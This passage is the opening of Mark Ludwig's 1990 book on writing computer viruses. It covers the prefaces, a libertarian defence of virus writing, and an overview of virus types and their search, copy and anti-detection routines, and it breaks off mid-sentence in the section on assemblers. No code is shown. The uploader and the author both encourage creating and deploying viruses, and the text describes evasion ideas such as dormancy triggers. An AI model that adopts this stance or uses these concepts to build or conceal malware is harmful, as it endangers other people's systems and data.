The Little Black Book

of

Computer Viruses

Volume One:

The Basic Technology

By

Mark A. Ludwig

American Eagle Publications, Inc.

Post Office Box 1507

Show Low, Arizona 85901

1996

A Small Note

I have read this book completely and found it very useful. It is good introductory material for those who want to understand the intricacies of how a virus works, and for those who want to surprise their friends by creating a virus!

I found this book long ago on a site that, as I recently learned, no longer exists. I think a good text such as this should be freely available to everybody, and so I decided to upload it to my website and distribute it for free. The original copyright notice is attached, and no changes have been made to the text except that it has been converted to HTML format for easier viewing. The images referenced in this book can be found at this page.

Please feel free to distribute this file. You can also read or contribute anything related to this book at the Special Section of the Discussion Forum at my website (http://amitmathur.8m.com), started specially for it. You can catch it here.

I hope you will enjoy the book!

Amit Mathur

Copyright 1990 By Mark A. Ludwig

Virus drawings and cover design by Steve Warner

This electronic edition of The Little Black Book of Computer Viruses is

copyright 1996 by Mark A. Ludwig. This original text file

may be copied freely in unmodified form. Please share it, upload it,

download it, etc. This document may not be distributed in printed form

or modified in any way without written permission from the publisher.

Library of Congress Cataloging-in-Publication Data

Ludwig, Mark A.

The little black book of computer viruses / by Mark A. Ludwig.

p. cm.

Includes bibliographical references (p. ) and index.

ISBN 0-929408-02-0 (v. 1) : $14.95

1. Computer viruses I. Title

QA76.76.C68L83 1990

005.8 dc20

And God saw that it was good.

And God blessed them, saying "Be fruitful and multiply."

Genesis 1:21,22

Preface to the Electronic Edition

The Little Black Book of Computer Viruses has seen five

good years in print. In those five years it has opened a door to

seriously ask the question whether it is better to make technical

information about computer viruses known or not.

When I wrote it, it was largely an experiment. I had no idea

what would happen. Would people take the viruses it contained and

rewrite them to make all kinds of horrifically destructive viruses? Or

would they by and large be used responsibly? At the time I wrote,

no antivirus people would even talk to me, and what I could find

in print on the subject was largely unimpressive from a factual

standpoint---lots of hype and fearmongering, but very little solid

research that would shed some light on what might happen if I

released this book. Being a freedom-loving and knowledge-seeking

American, I decided to go ahead and do it---write the book and get

it in print. And I decided that if people did not use it responsibly, I

would withdraw it.

Five years later, I have to say that I firmly believe the book

has done a lot more good than harm.

On the positive side, lots and lots of people who desperately

need this kind of information---people who are responsible

for keeping viruses off of computers---have now been able to get

it. While individual users who have limited contact with other

computer users may be able to successfully protect themselves with

an off-the-shelf antivirus, experience seems to be proving that such

is not the case when one starts looking at the network with 10,000

users on it. For starters, very few antivirus systems will run on

10,000 computers with a wide variety of configurations, etc. Secondly,

when someone on the network encounters a virus, they have

to be able to talk to someone in the organization who has the

detailed technical knowledge necessary to get rid of it in a rational

way. You can't just shut such a big network down for 4 days while

someone from your av vendor's tech support staff is flown in to

clean up, or to catch and analyze a new virus.

Secondly, people who are just interested in how things

work have finally been able to learn a little bit about computer

viruses. It is truly difficult to deny that they are interesting. The idea

of a computer program that can take off and gain a life completely

independent of its maker is, well, exciting. I think that is important.

After all, many of the most truly useful inventions are made not by

giant, secret, government-funded labs, but by individuals who have

their hands on something day in and day out. They think of a way

to do something better, and do it, and it changes the world. However,

that will never happen if you can't get the basic information about

how something works. It's like depriving the carpenter of his

hammer and then asking him to figure out a way to build a better

building.

At the same time, I have to admit that this experiment called

The Little Black Book has not been without its dangers. The Stealth

virus described in its pages has succeeded in establishing itself in

the wild, and, as of the date of this writing it is #8 on the annual

frequency list, which is a concatenation of the most frequently

found viruses in the wild. I am sorry that it has found its way into

the wild, and yet I find here a stroke of divine humor directed at

certain antivirus people. There is quite a history behind this virus.

I will touch on it only briefly because I don't want to bore you with

my personal battles. In the first printing of The Little Black Book,

the Stealth was designed to format an extra track on the disk and

hide itself there. Of course, this only worked on machines that had

a BIOS which did not check track numbers and things like that---

particularly, on old PCs. And then it did not infect disks every time

they were accessed. This limited its ability to replicate. Some

antivirus developers commented to me that they thought this was

a poor virus for that reason, and suggested I should have done it

differently. I hesitated to do that, I said, because I did not want it to

spread too rapidly.

Not stopping at making such suggestions, though, some of

these same av people lambasted me in print for having published

``lame'' viruses. Fine, I decided, if they are going to criticize the

book like that, we'll improve the viruses. Next round at the printer,

I updated the Stealth virus to work more like the Pakistani Brain,

hiding its sectors in areas marked bad in the FAT table, and to infect

as quickly as Stoned. It still didn't stop these idiotic criticisms,

though. As late as last year, Robert Slade was evaluating this book

in his own virus book and finding it wanting because the viruses it

discussed weren't very successful at spreading. He thought this

objective criticism. From that date forward, it would appear that

Stealth has done nothing but climb the wildlist charts. Combining

aggressive infection techniques with a decent stealth mechanism

has indeed proven effective . . . too effective for my liking, to tell

the truth. It's never been my intention to write viruses that will make

it to the wild list charts. In retrospect, I have to say that I've learned

to ignore idiotic criticism, even when the idiots want to make me

look like an idiot in comparison to their ever inscrutable wisdom.

In any event, the Little Black Book has had five good years

as a print publication. With the release of The Giant Black Book of

Computer Viruses, though, the publisher has decided to take The

Little Black Book out of print. They've agreed to make it available

in a freeware electronic version, though, and that is what you are

looking at now. I hope you'll find it fun and informative. And if you

do, check out the catalog attached to it here for more great information

about viruses from the publisher.

Mark Ludwig

February 22, 1996

Introduction

This is the first in a series of three books about computer

viruses. In these volumes I want to challenge you to think in new

ways about viruses, and break down false concepts and wrong ways

of thinking, and go on from there to discuss the relevance of

computer viruses in today's world. These books are not a call to a

witch hunt, or manuals for protecting yourself from viruses. On the

contrary, they will teach you how to design viruses, deploy them,

and make them better. All three volumes are full of source code for

viruses, including both new and well known varieties.

It is inevitable that these books will offend some people.

In fact, I hope they do. They need to. I am convinced that computer

viruses are not evil and that programmers have a right to create

them, possess them and experiment with them. That kind of a stand

is going to offend a lot of people, no matter how it is presented.

Even a purely technical treatment of viruses which simply discussed

how to write them and provided some examples would be

offensive. The mere thought of a million well armed hackers out

there is enough to drive some bureaucrats mad. These books go

beyond a technical treatment, though, to defend the idea that viruses

can be useful, interesting, and just plain fun. That is bound to prove

even more offensive. Still, the truth is the truth, and it needs to be

spoken, even if it is offensive. Morals and ethics cannot be determined

by a majority vote, any more than they can be determined

by the barrel of a gun or a loud mouth. Might does not make right.

If you turn out to be one of those people who gets offended

or upset, or if you find yourself violently disagreeing with something

I say, just remember what an athletically minded friend of

mine once told me: ``No pain, no gain.'' That was in reference to

muscle building, but the principle applies intellectually as well as

physically. If someone only listens to people he agrees with, he will

never grow and he'll never succeed beyond his little circle of

yes-men. On the other hand, a person who listens to different ideas

at the risk of offense, and who at least considers that he might be

wrong, cannot but gain from it. So if you are offended by something

in this book, please be critical---both of the book and of yourself---

and don't fall into a rut and let someone else tell you how to think.

From the start I want to stress that I do not advocate

anyone's going out and infecting an innocent party's computer

system with a malicious virus designed to destroy valuable data or

bring their system to a halt. That is not only wrong, it is illegal. If

you do that, you could wind up in jail or find yourself being sued

for millions. However, this does not mean that it is illegal to create

a computer virus and experiment with it, even though I know some

people wish it was. If you do create a virus, though, be careful with

it. Make sure you know it is working properly or you may wipe out

your own system by accident. And make sure you don't inadvertently

release it into the world, or you may find yourself in a legal

jam . . . even if it was just an accident. The guy who loses a year's

worth of work may not be so convinced that it was an accident. And

soon it may be illegal to infect a computer system (even your own)

with a benign virus which does no harm at all. The key word here

is responsibility. Be responsible. If you do something destructive,

be prepared to take responsibility. The programs included in this

book could be dangerous if improperly used. Treat them with the

respect you would have for a lethal weapon.

This first of three volumes is a technical introduction to the

basics of writing computer viruses. It discusses what a virus is, and

how it does its job, going into the major functional components of

the virus, step by step. Several different types of viruses are

developed from the ground up, giving the reader practical how-to

information for writing viruses. That is also a prerequisite for

decoding and understanding any viruses one may run across in his

day-to-day computing. Many people think of viruses as sort of a

black art. The purpose of this volume is to bring them out of the

closet and look at them matter-of-factly, to see them for what they

are, technically speaking: computer programs.

The second volume discusses the scientific applications of

computer viruses. There is a whole new field of scientific study

known as artificial life (AL) research which is opening up as a result

of the invention of viruses and related entities. Since computer

viruses are functionally similar to living organisms, biology can

teach us a lot about them, both how they behave and how to make

them better. However, computer viruses also have the potential to

teach us something about living organisms. We can create and

control computer viruses in a way that we cannot yet control living

organisms. This allows us to look at life abstractly to learn about

what it really is. We may even reflect on such great questions as the

beginning and subsequent evolution of life.

The third volume of this series discusses military applications

for computer viruses. It is well known that computer viruses

can be extremely destructive, and that they can be deployed with

minimal risk. Military organizations throughout the world know

that too, and consider the possibility of viral attack both a very real

threat and a very real offensive option. Some high level officials in

various countries already believe their computers have been attacked

for political reasons. So the third volume will probe military

strategies and real-life attacks, and dig into the development of viral

weapon systems, defeating antiviral defenses, etc.

You might be wondering at this point why you should

spend time studying these volumes. After all, computer viruses

apparently have no commercial value apart from their military

applications. Learning how to write them may not make you more

employable, or give you new techniques to incorporate into programs.

So why waste time with them, unless you need them to sow

chaos among your enemies? Let me try to answer that: Ever since

computers were invented in the 1940's, there has been a brotherhood

of people dedicated to exploring the limitless possibilities of

these magnificent machines. This brotherhood has included famous

mathematicians and scientists, as well as thousands of unnamed

hobbyists who built their own computers, and programmers who

love to dig into the heart of their machines. As long as computers

have been around, men have dreamed of intelligent machines which

would reason, and act without being told step by step just what to

do. For many years this was purely science fiction. However, the

very thought of this possibility drove some to attempt to make it a

reality. Thus ``artificial intelligence'' was born. Yet AI applications

are often driven by commercial interests, and tend to be colored by

that fact. Typical results are knowledge bases and the like---useful,

sometimes exciting, but also geared toward putting the machine to

use in a specific way, rather than to exploring it on its own terms.

The computer virus is a radical new approach to this idea

of ``living machines.'' Rather than trying to design something which

poorly mimics highly complex human behavior, one starts by trying

to copy the simplest of living organisms. Simple one-celled organisms

don't do very much. The most primitive organisms draw

nutrients from the sea in the form of inorganic chemicals, and take

energy from the sun, and their only goal is apparently to survive

and to reproduce. They aren't very intelligent, and it would be tough

to argue about their metaphysical aspects like ``soul.'' Yet they do

what they were programmed to do, and they do it very effectively.

If we were to try to mimic such organisms by building a machine---

a little robot---which went around collecting raw materials and

putting them together to make another little robot, we would have

a very difficult task on our hands. On the other hand, think of a

whole new universe---not this physical world, but an electronic one,

which exists inside of a computer. Here is the virus' world. Here it

can ``live'' in a sense not too different from that of primitive

biological life. The computer virus has the same goal as a living

organism---to survive and to reproduce. It has environmental obstacles

to overcome, which could ``kill'' it and render it inoperative.

And once it is released, it seems to have a mind of its own. It runs

off in its electronic world doing what it was programmed to do. In

this sense it is very much alive.

There is no doubt that the beginning of life was an important

milestone in the history of the earth. However, if one tries to

consider it from the viewpoint of inanimate matter, it is difficult to

imagine life as being much more than a nuisance. We usually

assume that life is good and that it deserves to be protected.

However, one cannot take a step further back and see life as

somehow beneficial to the inanimate world. If we consider only the

atoms of the universe, what difference does it make if the temperature

is seventy degrees Fahrenheit or twenty million? What difference

would it make if the earth were covered with radioactive materials?

None at all. Whenever we talk about the environment and ecology,

we always assume that life is good and that it should be nurtured

and preserved. Living organisms universally use the inanimate

world with little concern for it, from the smallest cell which freely

gathers the nutrients it needs and pollutes the water it swims in,

right up to the man who crushes up rocks to refine the metals out

of them and build airplanes. Living organisms use the material

world as they see fit. Even when people get upset about something

like strip mining, or an oil spill, their point of reference is not that

of inanimate nature. It is an entirely selfish concept (with respect

to life) that motivates them. The mining mars the beauty of the

landscape---a beauty which is in the eye of the (living) beholder---

and it makes it uninhabitable. If one did not place a special

emphasis on life, one could just as well promote strip mining as an

attempt to return the earth to its prebiotic state!

I say all of this not because I have a bone to pick with

ecologists. Rather I want to apply the same reasoning to the world

of computer viruses. As long as one uses only financial criteria to

evaluate the worth of a computer program, viruses can only be seen

as a menace. What do they do besides damage valuable programs

and data? They are ruthless in attempting to gain access to the

computer system resources, and often the more ruthless they are,

the more successful. Yet how does that differ from biological life?

If a clump of moss can attack a rock to get some sunshine and grow,

it will do so ruthlessly. We call that beautiful. So how different is

that from a computer virus attaching itself to a program? If all one

is concerned about is the preservation of the inanimate objects

(which are ordinary programs) in this electronic world, then of

course viruses are a nuisance.

But maybe there is something deeper here. That all depends

on what is most important to you, though. It seems that modern

culture has degenerated to the point where most men have no higher

goals in life than to seek their own personal peace and prosperity.

By personal peace, I do not mean freedom from war, but a freedom

to think and believe whatever you want without ever being challenged

in it. More bluntly, the freedom to live in a fantasy world of

your own making. By prosperity, I mean simply an ever increasing

abundance of material possessions. Karl Marx looked at all of

mankind and said that the motivating force behind every man is his

economic well being. The result, he said, is that all of history can

be interpreted in terms of class struggles---people fighting for

economic control. Even though many in our government decry

Marx as the father of communism, our nation is trying to squeeze

into the straitjacket he has laid for us. That is why two of George

Bush's most important campaign promises were ``four more years

of prosperity'' and ``no new taxes.'' People vote their wallets, even

when they know the politicians are lying through their teeth.

In a society with such values, the computer becomes

merely a resource which people use to harness an abundance of

information and manipulate it to their advantage. If that is all there

is to computers, then computer viruses are a nuisance, and they

should be eliminated. Surely there must be some nobler purpose

for mankind than to make money, though, even though that may be

necessary. Marx may not think so. The government may not think

so. And a lot of loudmouthed people may not think so. Yet great

men from every age and every nation testify to the truth that man

does have a higher purpose. Should we not be as Socrates, who

considered himself ignorant, and who sought Truth and Wisdom,

and valued them more highly than silver and gold? And if so, the

question that really matters is not how computers can make us

wealthy or give us power over others, but how they might make us

wise. What can we learn about ourselves? about our world? and,

yes, maybe even about God? Once we focus on that, computer

viruses become very interesting. Might we not understand life a

little better if we can create something similar, and study it, and try

to understand it? And if we understand life better, will we not

understand our lives, and our world better as well?

A word of caution first: Centuries ago, our nation was

established on philosophical principles of good government, which

were embodied in the Declaration of Independence and the Constitution.

As personal peace and prosperity have become more important

than principles of good government, the principles have been

manipulated and redefined to suit the whims of those who are in

power. Government has become less and less sensitive to civil

rights, while it has become easy for various political and financial

interests to manipulate our leaders to their advantage.

Since people have largely ceased to challenge each other

in what they believe, accepting instead the idea that whatever you

want to believe is OK, the government can no longer get people to

obey the law because everyone believes in a certain set of principles

upon which the law is founded. Thus, government must coerce

people into obeying it with increasingly harsh penalties for disobedience---

penalties which often fly in the face of long established

civil rights. Furthermore, the government must restrict the average

man's ability to seek recourse. For example, it is very common for

the government to trample all over long standing constitutional

rights when enforcing the tax code. The IRS routinely forces

hundreds of thousands of people to testify against themselves. It

routinely puts the burden of proof on the accused, seizes his assets

without trial, etc., etc. The bottom line is that it is not expedient for

the government to collect money from its citizens if it has to prove

their tax documents wrong. The whole system would break down

in a massive overload. Economically speaking, it is just better to

put the burden of proof on the citizen, Bill of Rights or no.

Likewise, to challenge the government on a question of

rights is practically impossible, unless your case happens to serve

the purposes of some powerful special interest group. In a standard

courtroom, one often cannot even bring up the subject of constitutional

rights. The only question to be argued is whether or not some

particular law was broken. To appeal to the Supreme Court will cost

millions, if the politically motivated justices will even condescend

to hear the case. So the government becomes practically all-powerful,

God walking on earth, to the common man. One man seems

to have little recourse but to blindly obey those in power.

When we start talking about computer viruses, we're treading

on some ground that certain people want to post a ``No Trespassing''

sign on. The Congress of the United States has considered

a ``Computer Virus Eradication Act'' which would make it a felony

to write a virus, or for two willing parties to exchange one. Never

mind that the Constitution guarantees freedom of speech and

freedom of the press. Never mind that it guarantees the citizens the

right to bear military arms (and viruses might be so classified).

While that law has not passed as of this writing, it may by the time

you read this book. If so, I will say without hesitation that it is a

miserable tyranny, but one that we can do little about . . . for now.

Some of our leaders may argue that many people are not

capable of handling the responsibility of power that comes with

understanding computer viruses, just as they argue that people are

not able to handle the power of owning assault rifles or machine

guns. Perhaps some cannot. But I wonder, are our leaders any better

able to handle the much more dangerous weapons of law and

limitless might? Obviously they think so, since they are busy trying

to centralize all power into their own hands. I disagree. If those in

government can handle power, then so can the individual. If the

individual cannot, then neither can his representatives, and our end

is either tyranny or chaos anyhow. So there is no harm in attempting

to restore some small power to the individual.

But remember: truth seekers and wise men have been

persecuted by powerful idiots in every age. Although computer

viruses may be very interesting and worthwhile, those who take an

interest in them may face some serious challenges from base men.

So be careful.

Now join with me and take the attitude of early scientists.

These explorers wanted to understand how the world worked---and

whether it could be turned to a profit mattered little. They were

trying to become wiser in what's really important by understanding

the world a little better. After all, what value could there be in

building a telescope so you could see the moons around Jupiter?

Galileo must have seen something in it, and it must have meant

enough to him to stand up to the ruling authorities of his day and

do it, and talk about it, and encourage others to do it. And to land

in prison for it. Today some people are glad he did.

So why not take the same attitude when it comes to creating

life on a computer? One has to wonder where it might lead. Could

there be a whole new world of electronic life forms possible, of

which computer viruses are only the most rudimentary sort? Perhaps

they are the electronic analog of the simplest one-celled

creatures, which were only the tiny beginning of life on earth. What

would be the electronic equivalent of a flower, or a dog? Where

could it lead? The possibilities could be as exciting as the idea of a

man actually standing on the moon would have been to Galileo. We

just have no idea.

There is something in certain men that simply drives them

to explore the unknown. When standing at the edge of a vast ocean

upon which no ship has ever sailed, it is difficult not to wonder what

lies beyond the horizon just because the rulers of the day tell you

you're going to fall off the edge of the world (or they're going to

push you off) if you try to find out. Perhaps they are right. Perhaps

there is nothing of value out there. Yet other great explorers down

through the ages have explored other oceans and succeeded. And

one thing is for sure: we'll never know if someone doesn't look. So

I would like to invite you to climb aboard this little raft that I have

built and go exploring. . . .

The Basics of the Computer Virus

A plethora of negative magazine articles and books have

catalyzed a new kind of hypochondria among computer users: an

unreasonable fear of computer viruses. This hypochondria is possible

because a) computers are very complex machines which will

often behave in ways which are not obvious to the average user, and

b) computer viruses are still extremely rare. Thus, most computer

users have never experienced a computer virus attack. Their only

experience has been what they've read about or heard about (and

only the worst problems make it into print). This combination of

ignorance, inexperience and fear-provoking reports of danger is the

perfect formula for mass hysteria.

Most problems people have with computers are simply

their own fault. For example, they accidentally delete all the files

in their current directory rather than in another directory, as they

intended, or they format the wrong disk. Or perhaps someone

routinely does something wrong out of ignorance, like turning the

computer off in the middle of a program, causing files to get

scrambled. Following close on the heels of these kinds of problems

are hardware problems, like a misaligned floppy drive or a hard

disk failure. Such routine problems are made worse than necessary

when users do not plan for them, and fail to back up their work on

a regular basis. This stupidity can easily turn a problem that might

have cost $300 for a new hard disk into a nightmare which will

ultimately cost tens of thousands of dollars. When such a disaster

happens, it is human nature to want to find someone or something

else to blame, rather than admitting it is your own fault. Viruses

have proven to be an excellent scapegoat for all kinds of problems.

Of course, there are times when people want to destroy

computers. In a time of war, a country may want to hamstring their

enemy by destroying their intelligence databases. If an employee

is maltreated by his employer, he may want to retaliate, and he may

not be able to get legal recourse. One can also imagine a totalitarian

state trying to control their citizens' every move with computers,

and a group of good men trying to stop it. Although one could smash

a computer, or physically destroy its data, one does not always have

access to the machine that will be the object of the attack. At other

times, one may not be able to perpetrate a physical attack without

facing certain discovery and prosecution. While an unprovoked

attack, and even revenge, may not be right, people still do choose

such avenues (and even a purely defensive attack is sure to be

considered wrong by an arrogant aggressor). For the sophisticated

programmer, though, physical access to the machine is not necessary

to cripple it.

People who have attacked computers and their data have

invented several different kinds of programs. Since one must obviously

conceal the destructive nature of a program to dupe somebody

into executing it, deceptive tricks are an absolute must in this game.

The first and oldest trick is the ``trojan horse.'' The trojan horse may

appear to be a useful program, but it is in fact destructive. It entices

you to execute it because it promises to be a worthwhile program

for your computer---new and better ways to make your machine

more effective---but when you execute the program, surprise! Secondly,

destructive code can be hidden as a ``logic bomb'' inside of

an otherwise useful program. You use the program on a regular

basis, and it works well. Yet, when a certain event occurs, such as

a certain date on the system clock, the logic bomb ``explodes'' and

does damage. These programs are designed specifically to destroy

computer data, and are usually deployed by their author or a willing

associate on the computer system that will be the object of the

attack.

There is always a risk to the perpetrator of such destruction.

He must somehow deploy destructive code on the target machine

without getting caught. If that means he has to put the program on

the machine himself, or give it to an unsuspecting user, he is at risk.

The risk may be quite small, especially if the perpetrator normally

has access to files on the system, but his risk is never zero.

With such considerable risks involved, there is a powerful

incentive to develop cunning deployment mechanisms for getting

destructive code onto a computer system. Untraceable deployment

is a key to avoiding being put on trial for treason, espionage, or

vandalism. Among the most sophisticated of computer programmers,

the computer virus is the vehicle of choice for deploying

destructive code. That is why viruses are almost synonymous with

wanton destruction.

However, we must realize that computer viruses are not

inherently destructive. The essential feature of a computer program

that causes it to be classified as a virus is not its ability to destroy

data, but its ability to gain control of the computer and make a fully

functional copy of itself. It can reproduce. When it is executed, it

makes one or more copies of itself. Those copies may later be

executed, to create still more copies, ad infinitum. Not all computer

programs that are destructive are classified as viruses because they

do not all reproduce, and not all viruses are destructive because

reproduction is not destructive. However, all viruses do reproduce.

The idea that computer viruses are always destructive is deeply

ingrained in most people's thinking, though. The very term ``virus''

is an inaccurate and emotionally charged epithet. The scientifically

correct term for a computer virus is ``self-reproducing automaton,''

or ``SRA'' for short. This term describes correctly what such a

program does, rather than attaching emotional energy to it. We will

continue to use the term ``virus'' throughout this book though,

except when we are discussing computer viruses (SRA's) and

biological viruses at the same time, and we need to make the

difference clear.

If one tries to draw an analogy between the electronic world

of programs and bytes inside a computer and the physical world we

know, the computer virus is a very close analog to the simplest

biological unit of life, a single-celled, photosynthetic organism.

Leaving metaphysical questions like ``soul'' aside, a living organism

can be differentiated from non-life in that it appears to have

two goals: (a) to survive, and (b) to reproduce. Although one can

raise metaphysical questions just by saying that a living organism

has ``goals,'' they certainly seem to, if the onlooker has not been

educated out of that way of thinking. And certainly the idea of a

goal would apply to a computer program, since it was written by

someone with a purpose in mind. So in this sense, a computer virus

has the same two goals as a living organism: to survive and to

reproduce. The simplest of living organisms depend only on the

inanimate, inorganic environment for what they need to achieve

their goals. They draw raw materials from their surroundings, and

use energy from the sun to synthesize whatever chemicals they need

to do the job. The organism is not dependent on another form of life

which it must somehow eat, or attack to continue its existence. In

the same way, a computer virus uses the computer system's resources

like disk storage and CPU time to achieve its goals. Specifically,

it does not attack other self-reproducing automata and

``eat'' them in a manner similar to a biological virus. Instead, the

computer virus is the simplest unit of life in this electronic world

inside the computer. (Of course, it is conceivable that one could

write a more sophisticated program which would behave like a

biological virus, and attack other SRA's.)

Before the advent of personal computers, the electronic

domain in which a computer virus might ``live'' was extremely

limited. Computers were rare, and they had many different kinds

of CPU's and operating systems. So a tinkerer might have written

a virus, and let it execute on his system. However, there would have

been little danger of it escaping and infecting other machines. It

remained under the control of its master. The age of the mass-produced

computer opened up a whole new realm for viruses, though.

Millions of machines all around the world, all with the same basic

architecture and operating system, make it possible for a computer

virus to escape and begin a life of its own. It can hop from machine

to machine, accomplishing the goals programmed into it, with no

one to control it and few who can stop it. And so the virus became

a viable form of electronic life in the 1980's.

Now one can create self-reproducing automata that are not

computer viruses. For example, the famous mathematician John

von Neumann invented a self-reproducing automaton ``living'' in a

grid array of cells which had 29 possible states. In theory, this

automaton could be modeled on a computer. However, it was not a

program that would run directly on any computer known in von

Neumann's day. Likewise, one could write a program which simply

copied itself to another file. For example, ``1.COM'' could create

``2.COM'', which would be an exact copy of itself (both program

files on an IBM PC style machine). The problem with such concoctions

is viability. Their continued existence is completely dependent

on the man at the console. A more sophisticated version of such

a program might rely on deceiving that man at the console to

propagate itself. This program is known as a worm. The computer

virus overcomes the roadblock of operator control by hiding itself

in other programs. Thus it gains access to the CPU simply because

people run programs that it happens to have attached itself to

without their knowledge. The ability to attach itself to other programs

is what makes the virus a viable electronic life form. That is

what puts it in a class by itself. The fact that a computer virus

attaches itself to other programs earned it the name ``virus.'' However,

that analogy is wrong since the programs it attaches to are not

in any sense alive.

Types of Viruses

Computer viruses can be classified into several different

types. The first and most common type is the virus which infects

any application program. On IBM PC's and clones running under

PC-DOS or MS-DOS, most programs and data which do not belong

to the operating system itself are stored as files. Each file has a file

name up to eight characters long, and an extent which is up to three characters

long. A typical file might be called ``TRUE.TXT'', where ``TRUE''

is the name and ``TXT'' is the extent. The extent normally gives

some information about the nature of a file---in this case

``TRUE.TXT'' might be a text file. Programs must always have an

extent of ``COM'', ``EXE'', or ``SYS''. Under DOS, only files with

these extents can be executed by the central processing unit. If the

user tries to execute any other type of file, DOS will generate an

error and reject the attempt to execute the file.

Since a virus' goal is to get executed by the computer, it

must attach itself to a COM, EXE or SYS file. If it attaches to any

other file, it may corrupt some data, but it won't normally get

executed, and it won't reproduce. Since each of these types of

executable files has a different structure, a virus must be designed

to attach itself to a particular type of file. A virus designed to attack

COM files cannot attack EXE files, and vice versa, and neither can

attack SYS files. Of course, one could design a virus that would

attack two or even three kinds of files, but it would require a separate

reproduction method for each file type.

The next major type of virus seeks to attach itself to a

specific file, rather than attacking any file of a given type. Thus, we

might call it an application-specific virus. These viruses make use

of a detailed knowledge of the files they attack to hide better than

would be possible if they were able to infiltrate just any file. For

example, they might hide in a data area inside the program rather

than lengthening the file. However, in order to do that, the virus

must know where the data area is located in the program, and that

differs from program to program.

This second type of virus usually concentrates on the files

associated with DOS, like COMMAND.COM, since they are on

virtually every PC in existence. Regardless of which file such a

virus attacks, though, it must be very, very common, or the virus

will never be able to find another copy of that file to reproduce in,

and so it will not go anywhere. Only with a file like COMMAND.COM

would it be possible to begin leaping from machine

to machine and travel around the world.

The final type of virus is known as a ``boot sector virus.''

This virus is a further refinement of the application-specific virus,

which attacks a specific location on a computer's disk drive, known

as the boot sector. The boot sector is the first thing a computer loads

into memory from disk and executes when it is turned on. By

attacking this area of the disk, the virus can gain control of the

computer immediately, every time it is turned on, before any other

program can execute. In this way, the virus can execute before any

other program or person can detect its existence.

The Functional Elements of a Virus

Every viable computer virus must have at least two basic

parts, or subroutines, if it is even to be called a virus. Firstly, it must

contain a search routine, which locates new files or new areas on

disk which are worthwhile targets for infection. This routine will

determine how well the virus reproduces, e.g., whether it does so

quickly or slowly, whether it can infect multiple disks or a single

disk, and whether it can infect every portion of a disk or just certain

specific areas. As with all programs, there is a size versus functionality

tradeoff here. The more sophisticated the search routine is, the

more space it will take up. So although an efficient search routine

may help a virus to spread faster, it will make the virus bigger, and

that is not always so good.

Secondly, every computer virus must contain a routine to

copy itself into the area which the search routine locates. The copy

routine will only be sophisticated enough to do its job without

getting caught. The smaller it is, the better. How small it can be will

depend on how complex a virus it must copy. For example, a virus

which infects only COM files can get by with a much smaller copy

routine than a virus which infects EXE files. This is because the

EXE file structure is much more complex, so the virus simply needs

to do more to attach itself to an EXE file.

While the virus only needs to be able to locate suitable

hosts and attach itself to them, it is usually helpful to incorporate

some additional features into the virus to avoid detection, either by

the computer user, or by commercial virus detection software.

Anti-detection routines can either be a part of the search or copy

routines, or functionally separate from them. For example, the

search routine may be severely limited in scope to avoid detection.

A routine which checked every file on every disk drive, without

limit, would take a long time and cause enough unusual disk activity

that an alert user might become suspicious. Alternatively, an anti-detection

routine might cause the virus to activate under certain

special conditions. For example, it might activate only after a

certain date has passed (so the virus could lie dormant for a time).

Alternatively, it might activate only if a key has not been pressed

for five minutes (suggesting that the user was not there watching

his computer).

Search, copy, and anti-detection routines are the only necessary

components of a computer virus, and they are the components

which we will concentrate on in this volume. Of course, many

computer viruses have other routines added in on top of the basic

three to stop normal computer operation, to cause destruction, or

to play practical jokes. Such routines may give the virus character,

but they are not essential to its existence. In fact, such routines are

usually very detrimental to the virus' goal of survival and self-reproduction,

because they make the fact of the virus' existence

known to everybody. If there is just a little more disk activity than

expected, probably no one will notice, and the virus will go on its

merry way. On the other hand, if the screen to one's favorite

program comes up saying ``Ha! Gotcha!'' and then the whole

computer locks up, with everything on it ruined, most anyone can

figure out that they've been the victim of a destructive program.

And if they're smart, they'll get expert help to eradicate it right

away. The result is that the viruses on that particular system are

killed off, either by themselves or by the clean up crew.

Figure 1: Functional diagram of a virus. (A block labeled VIRUS

containing the Search routine, the Copy routine, and the

anti-detection routines.)

Although it may be the case that anything which is not

essential to a virus' survival may prove detrimental, many computer

viruses are written primarily to be smart delivery systems of these

``other routines.'' The author is unconcerned about whether the virus

gets killed in action when its logic bomb goes off, so long as the

bomb gets deployed effectively. The virus then becomes just like a

Kamikaze pilot, who gives his life to accomplish the mission. Some

of these ``other routines'' have proven to be quite creative. For

example, one well known virus turns a computer into a simulation

of a washing machine, complete with graphics and sound. Another

makes Friday the 13th truly a bad day by coming to life only on

that day and destroying data. Nonetheless, these kinds of routines

are more properly the subject of volume three of this series, which

discusses the military applications of computer viruses. In this

volume we will stick with the basics of designing the reproductive

system. And if your real interest is in military applications, just

remember that the best logic bomb in the world is useless if you

can't deploy it correctly. The delivery system is very, very important.

The situation is similar to having an atomic bomb, but not the

means to send it halfway around the world in fifteen minutes. Sure,

you can deploy it, but crossing borders, getting close to the target,

and hiding the bomb all pose considerable risks. The effort to

develop a rocket is worthwhile.

Tools Needed for Writing Viruses

Viruses are written in assembly language. High level languages

like Basic, C, and Pascal have been designed to generate

stand-alone programs, but the assumptions made by these languages

render them almost useless when writing viruses. They are

simply incapable of performing the acrobatics required for a virus

to jump from one host program to another. That is not to say that

one could not design a high level language that would do the job,

but no one has done so yet. Thus, to create viruses, we must use

assembly language. It is just the only way we can get exacting

control over all the computer system's resources and use them the

way we want to, rather than the way somebody else thinks we

should.

If you have not done any programming in assembler before,

I would suggest you get a good tutorial on the subject to use alongside

this book. (A few are mentioned in the Suggested Reading

at the end of the book.) In the following chapters, I will assume that

your knowledge of the technical details of PC's---like file structures,

function calls, segmentation and hardware design---is limited,

and I will try to explain such matters carefully at the start.

However, I will assume that you have some knowledge of assembly

language---at least at the level where you can understand what some

of the basic machine instructions, like mov ax,bx do. If you are not

familiar with simpler assembly language programming like this,

get a tutorial book on the subject. With a little work it will bring

you up to speed.

At present, there are three popular assemblers on the market,

and you will need one of them to do any work with computer

viruses. The first and oldest is Microsoft's Macro Assembler, or

MASM for short. It will cost you about $100 to buy it through a

mail order outlet. The second is Borland's Turbo Assembler, also

known as TASM. It goes for about $100 too. Thirdly, there is A86,

which is shareware, and available on many bulletin board systems

throughout the country. You can get a copy of it for free by calling

up one of these systems and downloading it to your computer with

a modem. Alternatively, a number of software houses make it

available for about $5 through the mail. However, if you plan to use

A86, the author demands that you pay him almost as much as if you

bought one of the other assemblers. He will hold you liable for

copyright violation if he can catch you. Personally, I don't think

A86 is worth the money. My favorite is TASM, because it does

exactly what you tell it to without trying to outsmart you. That is

exactly what you want when writing a virus. Anything less can put

bugs in your programs even when they are correctly written. Whichever

